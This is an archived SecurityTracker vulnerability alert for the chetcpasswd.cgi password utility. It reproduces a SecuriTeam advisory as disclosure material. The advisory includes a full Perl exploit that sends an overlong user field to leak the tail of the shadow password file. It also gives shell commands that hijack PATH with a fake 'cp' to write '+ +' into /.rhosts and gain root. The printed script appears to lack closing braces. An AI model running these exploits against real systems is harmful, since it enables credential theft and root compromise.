SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  chetcpasswd.cgi Vendors:  Orso, Pedro L.
Chetcpasswd.cgi Bugs May Disclose Some Shadow Password File Contents to Remote Users and May Let Local Users Grab Root Privileges
SecurityTracker Alert ID:  1005847
SecurityTracker URL:  http://securitytracker.com/id?1005847
CVE Reference:  CVE-2002-2219 ,  CVE-2002-2221   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Dec 23 2002
Impact:  Disclosure of authentication information, Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): 1.2 and prior versions
Description:  A vulnerability was reported in the 'chetcpasswd.cgi' password utility. A remote user may be able to obtain access to portions of the shadow password file. A local user could gain root access on the system.

SecuriTeam reported that a remote user may be able to get a "shadow's tail". A remote user can reportedly submit the form with 120 chars in the user field to cause the system to return a tail of the shadow password file. Some demonstration exploit code is provided in the Source Message.

It is also reported that a local user can execute arbitrary shell commands with root privileges. The code reportedly trusts the PATH enviroment variable. A local user can create their own binary named "cp" and set the PATH variable to the directory containing their malicious "cp" binary. Then, the local user can use the web interface to cause the script to execute the malicious binary.

A demonstration exploit is provided:

echo "echo + + /.rhosts" > /tmp/cp
export PATH=/tmp:$PATH
Impact:  A remote user can obtain a "tail" of the shadow password file. A local user can execute arbitrary code with root privileges.
Solution:  No solution was available at the time of this entry.

The author of the report has indicated that, as a workaround, you can implement the '/etc/chetcpasswd.allow' file to restrict use of the script to specific IP addresses or IP address ranges.
Vendor URL:  web.onda.com.br/orso/ (Links to External Site)
Cause:  Exception handling error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  support@securiteam.com
Message History:   None.

 Source Message Contents
Date:  22 Dec 2002 12:24:46 +0200
From:  support@securiteam.com
Subject:  [UNIX] chetcpasswd.cgi Multiple Vulnerabilities

 

The following security advisory is sent to the securiteam mailing list, and can be found at the Secur
iTeam web site: http://www.securiteam.com
- - promotion

Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure, 
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -



  chetcpasswd.cgi Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

 <http://web.onda.com.br/orso/> Chpasswd is a utility allows your users to 
change his/her Squid or Web password using the browser. A lot of 
vulnerabilities have been found allowing remote attackers to get a 
"shadow's tail" without a valid user (Exploit Code Below) and (a possible) 
local exploit to get the root shell.

DETAILS

Vulnerable systems:
 * chetcpasswd version 1.2 and earlier

Exploit:
If you fill the form with 120 chars in the user field, the system return 
the shadow file's tail without any restriction.
 
Exploit Code (Remote):
#!/usr/bin/perl -w
#Exploit coded by Victor Pereira <vpereira@modulo.com.br>
#Thanks to Alexandre Vargas And Thiago Zaninotti
use strict;
use Socket;
my ($remote,$port, $iaddr, $paddr, 
$proto,$linha,$query,$len_query,$ARGC,$fakeuser,$linhas,$pattern);
 
$ARGC=@ARGV;
if($ARGC < 1){
        print "chetcpasswd.cgi exploit\n";
 print "coded by VP <vpereira\@modulo.com.br>\n";
        print "Usage:$0 <host>\n";
        exit;
 
$fakeuser="ASSHOLEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";
$pattern="User: E*E";
 
$query="user=$fakeuser&old_pw=teste&new_pw1=teste1&new_pw2=teste1&change='Altere
 minha senha'";
 
$len_query=length($query);
$remote = $ARGV[0];
$port = 80; # random port
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp') }
die "No port" unless $port;
$iaddr = inet_aton($remote) || die "no host: $remote";
$paddr = sockaddr_in($port, $iaddr);
 
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "socket: $!";
connect(SOCK, $paddr) || die "connect: $!";
select(SOCK); $|=1; select(STDOUT);
print SOCK "POST /cgi-bin/chetcpasswd.cgi HTTP/1.0\n";
print SOCK "Connection: Keep-Alive\n";
print SOCK "Content-type: application/x-www-form-urlencoded\n";
print SOCK "Content-length: $len_query\n";
print SOCK "\n$query\r\n\r\n";
 
$linha = "";
while (<SOCK>) {
 
    $linha = $_;
    if($linha =~ s/<.*?>//g){
         $linha =~ s/$pattern//g;
         print $linha;
} 
close (SOCK) || die "close: $!";
exit;
 

Exploit (Local):
 Reading the source code you can find (lines 229-235) something like this:
<codigo>
 
      if(ok) {
               sprintf(command,"cp %s %s",template,pwdfile);
        system(command);
        unlink(template);
        sprintf(Msg,"<font color=blue size=+2>%s %s.",msg18,User);
        Hmsg(Msg, Uid, Gid);
      }
</codigo>
 

Well, the code trust in a enviroment variable named PATH, if you create a 
script named "cp", change the value of the PATH variable, then you can via 
WWW interface can exec your cp.
 
Something like:
 echo "echo + + /.rhosts" > /tmp/cp
 export PATH=/tmp:$PATH

And then via Web interface you try to change your password.
 
Workaround:
From the README:
 
 Create /etc/chetcpasswd.allow file with IP's or sub-nets allowed to use.
 Eg.: 192.168.82.10 - only this IP will use
 192.168.82.0 - IP's from 1 to 255
 192.168.0.0 - ...
 192.0.0.0 - ...
 0.0.0.0 - allow anybody. A bad choice...


ADDITIONAL INFORMATION

This information has been provided by  <mailto:vpereira@modulo.com.br> 
Victor Pereira.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@secu
riteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.co
m 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, con
sequential, loss of business
 profits or special damages.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC